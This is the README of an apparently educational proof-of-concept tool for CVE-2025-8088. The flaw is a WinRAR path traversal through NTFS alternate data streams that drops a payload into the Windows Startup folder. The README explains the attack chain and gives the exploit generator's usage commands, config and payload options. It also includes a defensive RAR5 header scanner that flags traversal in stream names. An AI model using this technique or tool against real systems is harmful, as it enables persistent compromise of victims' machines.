CVE-2025-8088
Educational proof-of-concept for CVE-2025-8088 — WinRAR path traversal via NTFS Alternate Data Streams (ADS)
Quick Start · Vulnerability Overview · Usage · Configuration · FAQ · Disclaimer
CVE-2025-8088 is a high-severity path traversal vulnerability in WinRAR for Windows that lets an attacker write arbitrary files to sensitive locations when a victim extracts a crafted RAR archive. The archive stores the payload as an NTFS Alternate Data Stream (ADS) attached to a decoy file. WinRAR validated the file name but not the stream name that follows the colon (:), so ..\ segments placed after the colon are honoured when the stream is written, and the payload lands outside the intended extraction folder.
| Detail | Value |
|---|---|
| CVE ID | CVE-2025-8088 |
| CVSS v3.1 | 8.8 (HIGH) |
| CVSS v4.0 | 8.4 (HIGH) |
| Affected | WinRAR ≤ 7.12 and the Windows builds of command-line RAR, UnRAR, UnRAR.dll and the portable UnRAR source (Windows only) |
| Patched | WinRAR 7.13 (July 30, 2025) |
| Discovered | July 18, 2025 by ESET Research |
| Attribution | RomCom / Storm-0978 / Tropical Scorpius / UNC2596 |
| CISA KEV | Added to Known Exploited Vulnerabilities catalog |
| Vector | Crafted RAR archive → extract → payload in Startup folder |
- Attacker crafts a RAR archive containing a decoy file with the payload embedded as an ADS
- The ADS stream names carry ..\ path traversal segments that escape the extraction directory
- Target path: AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ under the victim's profile
- Victim extracts the archive; when the number of ..\ levels walks from the extraction folder up to the profile directory (the PoC's max_up setting controls this depth), the payload silently lands in the Startup folder
- At the next user login, Windows runs the payload automatically
Between July 18 and 21, 2025, the Russia-aligned threat group RomCom (also tracked as Storm-0978, Tropical Scorpius and UNC2596) exploited this vulnerability in spearphishing campaigns against financial, manufacturing, defense and logistics companies in Europe and Canada. At least 8 threat groups subsequently weaponized the exploit. ESET reported the vulnerability to RARLAB on July 24; WinRAR 7.13 was released on July 30, 2025.
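The mechanism above, as an added example that is not part of this PoC or of WinRAR's code: a header-only scanner for RAR 5.0 archives written for this README. It walks the header chain, picks out the STM service headers in which the RAR 5.0 format stores NTFS streams, reads the stream name from their service-data extra record (type 0x07, following the RAR 5.0 format notes and the unrar sources), and flags any name that carries path separators or a .. component; is_safe_stream_name is the check a hardened extractor applies before concatenating the stream name onto the destination path. The sample archive is constructed inline by build_sample_archive so the script runs offline; its layout (stored data, Windows host, no timestamps) and the handling of an optional :$DATA suffix are assumptions of the example, not facts taken from real samples. The same walk answers the detection question in the FAQ below: it can be run over suspicious attachments before anyone extracts them.

```python
# Added example for this README (not the PoC's or WinRAR's code): walk a RAR 5.0 header
# chain and flag NTFS stream (STM) service headers whose stream name carries path-traversal
# segments, the pattern behind CVE-2025-8088. Header-only: nothing is ever extracted.
import zlib

RAR5_SIGNATURE = b"Rar!\x1a\x07\x01\x00"
HEAD_MAIN, HEAD_FILE, HEAD_SERVICE, HEAD_ENDARC = 1, 2, 3, 5
HFL_EXTRA, HFL_DATA, HFL_CHILD = 0x01, 0x02, 0x20   # header flags: extra area, data area, child block
FHEXTRA_SUBDATA = 0x07   # extra record holding a service header's payload (the ADS name for STM)

def read_vint(buf, pos):
    """Decode a RAR5 vint (little-endian base-128); returns (value, next_pos)."""
    value = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7

def write_vint(value):
    out = bytearray()
    while value > 0x7F:
        out.append(value & 0x7F | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)

def is_safe_stream_name(stream_name):
    """Hardened check before appending an ADS name to the destination path: leading ':',
    no separators, no '.'/'..' (the colon does not stop Windows from normalising ..\\)."""
    if not stream_name.startswith(":"):
        return False
    body = stream_name[1:]
    if body.upper().endswith(":$DATA"):   # assumption: the stream-type suffix may be stored too
        body = body[:-6]
    return body not in ("", ".", "..") and not any(c in body for c in "\\/:")

def parse_subdata(extra):
    """Return the FHEXTRA_SUBDATA payload (UTF-8) from a header's extra area, or None."""
    pos = 0
    while pos < len(extra):
        rec_size, p = read_vint(extra, pos)   # record size is counted from the type field
        rec_type, q = read_vint(extra, p)
        if rec_type == FHEXTRA_SUBDATA:
            return extra[q:p + rec_size].decode("utf-8", "replace")
        pos = p + rec_size

def scan_rar5(data):
    """Return [{'file': ..., 'stream': ...}] for each STM header whose stream name fails the check."""
    if not data.startswith(RAR5_SIGNATURE):
        raise ValueError("not a RAR 5.0 archive")
    pos, current_file, findings = len(RAR5_SIGNATURE), None, []
    while pos < len(data):
        stored_crc = int.from_bytes(data[pos:pos + 4], "little")
        head_size, p = read_vint(data, pos + 4)
        head_end = p + head_size                 # header size is counted from the type field
        if zlib.crc32(data[pos + 4:head_end]) != stored_crc:
            raise ValueError(f"header CRC mismatch at offset {pos}")
        head_type, p = read_vint(data, p)
        head_flags, p = read_vint(data, p)
        extra_size, p = read_vint(data, p) if head_flags & HFL_EXTRA else (0, p)
        data_size, p = read_vint(data, p) if head_flags & HFL_DATA else (0, p)
        if head_type in (HEAD_FILE, HEAD_SERVICE):
            file_flags, p = read_vint(data, p)
            for _ in range(2): _, p = read_vint(data, p)      # unpacked size, attributes
            p += 4 * bool(file_flags & 0x02) + 4 * bool(file_flags & 0x04)   # mtime, data CRC32
            for _ in range(2): _, p = read_vint(data, p)      # compression info, host OS
            name_len, p = read_vint(data, p)
            name = data[p:p + name_len].decode("utf-8", "replace")
            if head_type == HEAD_FILE:
                current_file = name              # a following STM block attaches to this file
            elif name == "STM":
                stream = parse_subdata(data[head_end - extra_size:head_end])
                if stream is not None and not is_safe_stream_name(stream):
                    findings.append({"file": current_file, "stream": stream})
        pos = head_end + data_size               # skip the data area to the next header
    return findings

def build_header(head_type, body, extra=b"", data=b"", child=False):
    """One RAR5 block: CRC32 | size | type | flags | [extra size] [data size] | body | extra | data."""
    flags = (HFL_EXTRA if extra else 0) | (HFL_DATA if data else 0) | (HFL_CHILD if child else 0)
    fields = write_vint(head_type) + write_vint(flags)
    fields += (write_vint(len(extra)) if extra else b"") + (write_vint(len(data)) if data else b"")
    fields += body + extra
    sized = write_vint(len(fields)) + fields
    return zlib.crc32(sized).to_bytes(4, "little") + sized + data

def file_header(head_type, name, data=b"", extra=b"", child=False):
    """File (type 2) or service (type 3) header: stored, Windows host, no mtime/CRC."""
    raw = name.encode("utf-8")
    body = b"".join(write_vint(v) for v in (0, len(data), 0x20, 0, 0, len(raw))) + raw
    return build_header(head_type, body, extra, data, child)

def build_sample_archive(stream_name, payload=b"@echo off\r\n"):
    """Constructed sample (not a real capture): decoy file plus one STM header with the given ADS name."""
    sub = write_vint(FHEXTRA_SUBDATA) + stream_name.encode("utf-8")
    return (RAR5_SIGNATURE + build_header(HEAD_MAIN, write_vint(0))            # archive flags: none
            + file_header(HEAD_FILE, "resume.txt", b"decoy text")
            + file_header(HEAD_SERVICE, "STM", payload, write_vint(len(sub)) + sub, child=True)
            + build_header(HEAD_ENDARC, write_vint(0)))                        # end-of-archive flags: none
```

Run scan_rar5 over the bytes of an archive (for instance scan_rar5(open(path, "rb").read())); a non-empty result lists, for each offending stream, the decoy file it is attached to. Because the decision is made on header metadata rather than on the payload, it still works on archives whose payload is unknown to signature engines, and it fails closed on a header CRC mismatch instead of guessing.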
| # | Resource | Link |
|---|---|---|
| 1 | NVD Entry | nvd.nist.gov/vuln/detail/CVE-2025-8088 |
| 2 | ESET Research | welivesecurity.com — WinRAR zero-day |
| 3 | WinRAR Changelog | rarlab.com |
| 4 | Qualys Threat Advisory | threatprotect.qualys.com |
| 5 | AhnLab ASEC Advisory | asec.ahnlab.com |
| Area | Feature |
|---|---|
| Exploit engine | Path traversal via NTFS Alternate Data Streams (ADS) |
| Exploit engine | Configurable traversal depth (--max_up, default 16 levels) |
| Exploit engine | Auto-discovery of rar.exe in standard WinRAR paths |
| Exploit engine | Custom decoy file creation (auto-generated if missing) |
| Exploit engine | Payload injection into Windows Startup folder path |
| Interface | Interactive terminal interface with colorama colors |
| Interface | Interactive settings menu for all PoC parameters |
| Interface | About screen with full CVE technical details |
| Interface | Sample payload generator (harmless payload.bat) |
| Safety | Persistent JSON configuration (config.json) |
| Safety | Validation: requires drop folder and payload before execution |
| Safety | Direct CLI mode with argparse for scripted usage |
| Dependency | Version | Purpose |
|---|---|---|
| Python | 3.6+ | Runtime |
| WinRAR | rar.exe on the build host; ≤ 7.12 on the extracting host (vulnerable) | rar.exe for archive creation; only the extracting side needs to be unpatched |
| Windows NTFS | Required | ADS support (not FAT32/exFAT) |
| colorama | ≥ 0.4.6 | Terminal color output |
```shell
git clone <repository-url>
cd CVE-2025-8088
python launcher.py
```

Select [1] Install Dependencies from the menu to install colorama.
All settings are stored in config.json and editable from the launcher menu (option [2]) or manually. Example file with the drop folder filled in:

```json
{
  "decoy": "resume.txt",
  "payload": "payload.bat",
  "drop": "C:\\Users\\Public\\Documents",
  "rar": "",
  "out": "cve-2025-8088-sxy-poc.rar",
  "workdir": ".",
  "placeholder_len": 0,
  "max_up": 16,
  "base_out": ""
}
```

| Key | Description | Default |
|---|---|---|
| decoy | Decoy file shown to victim (created if missing) | resume.txt |
| payload | Payload file to embed (BAT, LNK, DLL, EXE) | payload.bat |
| drop | Benign extraction folder (absolute path) | "" |
| rar | Path to rar.exe (empty = auto-discover) | "" |
| out | Output RAR archive filename | cve-2025-8088-sxy-poc.rar |
| workdir | Working directory for temp files | . |
| max_up | Number of .. traversal levels | 16 |
```text
╔══════════════════════════════════════════════════════════╗
║ CVE-2025-8088 WinRAR Path Traversal PoC [CYBER]          ║
╚══════════════════════════════════════════════════════════╝
┌─ ACTIONS ──────────────────────────────────────────────┐
│ [1] Install Dependencies                               │
│ [2] Settings                                           │
│ [3] About                                              │
│ [4] Run PoC                                            │
│ [5] Usage / Help                                       │
│ [6] Create Sample Payload                              │
│ [0] Exit                                               │
└────────────────────────────────────────────────────────┘
```
| Option | Action |
|---|---|
| 1 | Install colorama and verify WinRAR presence |
| 2 | Configure decoy, payload, drop folder, rar path, traversal depth |
| 3 | Display CVE technical details and attribution info |
| 4 | Generate malicious RAR archive with embedded ADS payload |
| 5 | Show CLI usage and argument reference |
| 6 | Create a harmless sample payload.bat for testing |
| 0 | Exit |
```shell
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\you\Documents" --rar "C:\Program Files\WinRAR\rar.exe" --out poc-output.rar --max_up 16
```

| Argument | Required | Description |
|---|---|---|
| --decoy | Yes | Path to decoy file (auto-created if missing) |
| --payload | Yes | Path to payload file (BAT, LNK, DLL, etc.) |
| --drop | Yes | Absolute path to benign extraction folder |
| --rar | No | Path to rar.exe (auto-discovered if omitted) |
| --out | No | Output RAR filename |
| --workdir | No | Working directory |
| --max_up | No | Number of .. traversal segments (default: 16) |
```text
CVE-2025-8088/
├── main.py           # Entry point: sets CMD title/color, launches menu
├── launcher.py       # Terminal interface: settings, about, run
├── poc.py            # Core PoC engine: ADS creation, RAR generation
├── config.json       # Persistent settings (auto-created)
├── requirements.txt  # Python dependencies (colorama)
└── README.md         # This file
```
Does this work on Linux or macOS?
No. CVE-2025-8088 exploits NTFS Alternate Data Streams, which is a Windows-specific filesystem feature. The vulnerability does not affect Linux/Unix builds of WinRAR or RAR for Android. The PoC requires Windows NTFS and rar.exe.
Is WinRAR 7.13 safe?
Yes. RARLAB patched CVE-2025-8088 in WinRAR 7.13, released July 30, 2025. Update immediately if you are running version 7.12 or earlier.
Why does the PoC target the Startup folder?
The Windows Startup folder (AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\) is a well-known persistence mechanism — any executable placed there runs automatically on user login. This is the same technique used by RomCom in their real-world campaigns.
Can this be detected by antivirus?
Modern EDR solutions and updated antivirus signatures may detect the crafted RAR archive or the ADS traversal pattern. However, at the time of initial exploitation (July 2025), the technique was a zero-day with no signatures. This PoC is for educational verification of detection capabilities.
What is the "sample payload"?
Option [6] creates a harmless payload.bat that simply prints a message and pauses. It is designed for safe testing — it does not perform any malicious actions.
Who discovered this vulnerability?
ESET Research discovered CVE-2025-8088 on July 18, 2025, while analyzing spearphishing campaigns by the RomCom group (also known as Storm-0978, Tropical Scorpius, UNC2596). The vulnerability was reported to RARLAB on July 24, with a patch released on July 30.
This proof-of-concept is provided strictly for educational and authorized security research purposes.
- Do NOT use this tool against systems you do not own or have explicit written permission to test.
- The author assumes no liability for misuse, damage, or legal consequences arising from use of this tool.
- This PoC is intended for vulnerability verification, detection engineering, and security awareness training.
- Unauthorized use of exploit code may violate computer fraud laws in your jurisdiction.
- Update WinRAR to version 7.13 or later to mitigate this vulnerability.
If this PoC helped your research, consider leaving a star ⭐
Responsible disclosure saves lives. Patch your software.